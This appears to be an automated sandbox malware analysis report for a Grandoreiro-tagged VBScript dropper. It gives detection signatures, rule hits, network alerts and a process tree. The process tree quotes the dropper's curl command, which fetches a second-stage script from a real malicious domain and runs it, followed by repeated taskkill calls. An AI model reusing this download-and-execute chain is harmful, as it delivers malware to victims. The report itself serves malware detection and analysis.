Edit tour
Windows
Analysis Report
6724f91d7b548.vbs
Overview
General Information
| Sample name: | 6724f91d7b548.vbs |
| Analysis ID: | 1546872 |
| MD5: | 93d504e40783fcc1b7c49106351920cb |
| SHA1: | e63d6266045ac71cf3d00a4048a422a34386e036 |
| SHA256: | 6ddd2f425a66b16c56eaa2c711fbe2e998f34c3f03abef17c38c6d7209089680 |
| Tags: | geoGrandoreiroMEXPRTvbsuser-NDA0E |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Excessive usage of taskkill to terminate processes
Overwrites code with function prologues
Potential malicious VBS script found (has network functionality)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses ipconfig to lookup or modify the Windows network settings
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Keylogger Generic
Classification
- System is w10x64
wscript.exe (PID: 1132 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\6724f 91d7b548.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 7148 cmdline: "C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\6724f9 1d7b54a.vb s https:// processoec onsulta.on line/6724f 91d7b3cb/6 724f91d7b5 4a.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
curl.exe (PID: 7064 cmdline: curl -k -o C:\Users\ Public\672 4f91d7b54a .vbs https ://process oeconsulta .online/67 24f91d7b3c b/6724f91d 7b54a.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - cmd.exe (PID: 3608 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 724f91d7b5 4a.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 884 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6724f91d7 b54a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
CSRPS.exe (PID: 3536 cmdline: "C:\_6724f 91d7b3cb\C SRPS.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16) - cmd.exe (PID: 6468 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6980 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6520 cmdline:
cmd.exe /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 504 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 4196 cmdline:
ipconfig / flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB) - cmd.exe (PID: 3816 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4044 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 3608 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 884 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - PING.EXE (PID: 6336 cmdline:
ping 127.0 .0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - cmd.exe (PID: 6536 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 500 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 1336 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 5192 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 4368 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1668 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6256 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 1408 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 3796 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 5716 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2884 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 5412 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 5492 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 280 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4392 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 3196 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 1524 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - PING.EXE (PID: 2524 cmdline:
ping 127.0 .0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - cmd.exe (PID: 7052 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 6272 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 4788 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 2832 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 1224 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2524 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 4052 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 5664 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 6236 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7100 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4072 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 4072 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 6256 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 4492 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2120 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5412 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 948 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 5668 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 6424 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5668 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 4344 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 4836 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 724f91d7b5 4a.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 1268 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6724f91d7 b54a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
System Summary |   |
|---|
| Source: | Author: frack113, Florian Roth: | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: frack113: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Michael Haag: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-01T16:59:18.415121+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.6 | 49738 | TCP |
| 2024-11-01T16:59:57.166716+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.6 | 49951 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | ReversingLabs: | ||
| Source: | Binary or memory string: | memstr_db749296-6 | |
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 13_2_6FCDC2D0 | |
Software Vulnerabilities | |
|---|
| Source: | Child: | ||
Networking | |
|---|
| Source: | Network Connect: | Jump to behavior | ||
| Source: | Dropped file: | Jump to dropped file | ||
| Source: | Dropped file: | Jump to dropped file | ||
| Source: | Process created: | ||
| Source: | IP Address: | ||
| Source: | JA3 fingerprint: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||